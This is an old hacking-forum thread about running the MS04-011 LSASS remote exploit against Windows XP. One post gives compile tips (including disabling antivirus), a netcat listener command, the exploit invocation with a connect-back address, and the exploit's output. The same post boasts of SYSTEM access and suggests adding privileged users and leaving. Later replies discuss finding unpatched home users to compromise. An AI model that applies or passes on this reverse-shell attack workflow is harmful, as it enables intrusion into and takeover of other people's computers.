what
Hey, this exploit does work. I just tested it on Windows XP Home, SP1, but without the latest patches, and it worked. That's the point I wanted to make, I guess.

Also, for those with trouble compiling...

Add the line #include <iostream.h> to the top of the file. Also change it to lsass.c instead of lsass.cpp. Also, turn off Norton AntiVirus when compiling. Just a few things I would like to advise you to do to get this working.

Connect back is the best way to do hacking. Less trouble with firewalls (generally). This is what I typed to exploit myself, locally. First, fire up netcat with the command:

C:\WINNT>nc -L -p 4444

And just hit enter. Open another command prompt and type (fill in your ip address)

C:\WINNT>lsass 0 24.98.243.*** 4444 24.98.243.***

MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---

[*] Target: IP: 24.98.243.***: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to 24.98.243.***:445 ... OK
[*] Attacking ... OK

Now, as long as the Attacking ... OK is there, you currently have SYSTEM level access to the system you just exploited. That's right, you are even more powerful than an administrator. So I suggest we add some users with some power locally, and then get the hell out.
Ecko
QUOTE (what @ Jun 17 2004, 05:38 PM)
Hey, this exploit does work. I just tested it on Windows XP Home, SP1, but without the latest patches, and it worked. That's the point I wanted to make, I guess.

OK @ what... if nothing is patched then everything works... but most systems are patched because they are all afraid of the Sasser gay f*ck worm.
Krogoth
Exploit works fine with connect back as stated in the example above. However, most boxes are patched by now. Maybe if you're lucky, you'll get a 2Mbit DSL home user who seldom accesses the box and ignores updates.
realloader
We need exploit v0.2
But there is nothing to see.
twistedps
QUOTE (tomas\ @ May 3 2004, 12:13 PM)
QUOTE (Corsaro @ May 3 2004, 12:01 PM)
Hi, where can I get lsasrv's exploit for Windows? Thank you

Did you even look for it?

I'm sick of all these worms popping up when a major vulnerability was found in Windows. Especially when all they do is spread themselves and cause irritation for users, and therefore draw attention to the leak (also in the media).
Maybe that's the intention of the virus maker, to make clear people should patch their systems in time?

early bird gets the box.
xmen
very nice